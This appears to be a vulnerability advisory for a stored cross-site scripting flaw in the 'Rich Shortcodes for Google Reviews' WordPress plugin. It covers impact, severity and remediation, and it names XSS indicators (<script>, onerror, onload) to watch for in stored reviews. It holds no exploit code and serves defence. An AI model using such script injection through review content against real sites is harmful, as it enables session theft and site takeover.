A high-severity vulnerability exists in the "Rich Shortcodes for Google Reviews" WordPress plugin, which could allow an attacker to inject malicious code into a website. This is achieved by posting a specially crafted Google Review that, when displayed on the site, executes in the browsers of visitors. This could lead to the theft of user data, session hijacking, or redirection to malicious websites, posing a significant risk to the organization's reputation and its users' security.

This vulnerability is a Stored Cross-Site Scripting (XSS) flaw. The plugin fails to properly sanitize the content of Google Reviews before storing and displaying them on the WordPress site. An attacker can exploit this by creating a Google Review for a business that contains a malicious script (e.g., JavaScript). When the vulnerable plugin fetches and renders this review on the website, the malicious script is stored in the website's database and executed within the browser of any user who views the page, including administrators.

This vulnerability is rated as High severity with a CVSS score of 7.2. Successful exploitation could have significant negative consequences for the business. These include, but are not limited to, website defacement, theft of sensitive user information (such as session cookies or credentials entered into compromised forms), redirection of users to phishing or malware sites, and damage to the organization's brand and reputation. If an administrator's session is hijacked, the attacker could gain full control over the affected WordPress site.

Immediate Action: Apply vendor security updates immediately to patch the vulnerability. After patching, it is crucial to monitor for any signs of prior exploitation by reviewing web server access logs and audit trails for suspicious activity related to the plugin's functionality.

Proactive Monitoring: Implement monitoring to detect potential exploitation attempts. Security teams should look for unusual script tags (<script>, onerror, onload) or HTML event handlers within the database tables where reviews are stored. Monitor outbound web traffic from pages displaying the reviews for connections to unknown or malicious domains, which could indicate a successful XSS attack.

Compensating Controls: If immediate patching is not feasible, consider disabling the plugin temporarily to remove the attack vector. Implementing a Web Application Firewall (WAF) with robust XSS detection rules can also help block malicious payloads before they reach the web application, providing an additional layer of defense.

Public Exploit Available: false

Given the High severity (CVSS 7.2) of this vulnerability and the ease of exploitation, immediate action is required. Organizations must prioritize applying the vendor-supplied patch to all websites using the "Rich Shortcodes for Google Reviews" plugin. Although this CVE is not currently listed on the CISA KEV list, its potential impact on website integrity and user security warrants treating it with the highest urgency to prevent potential compromise.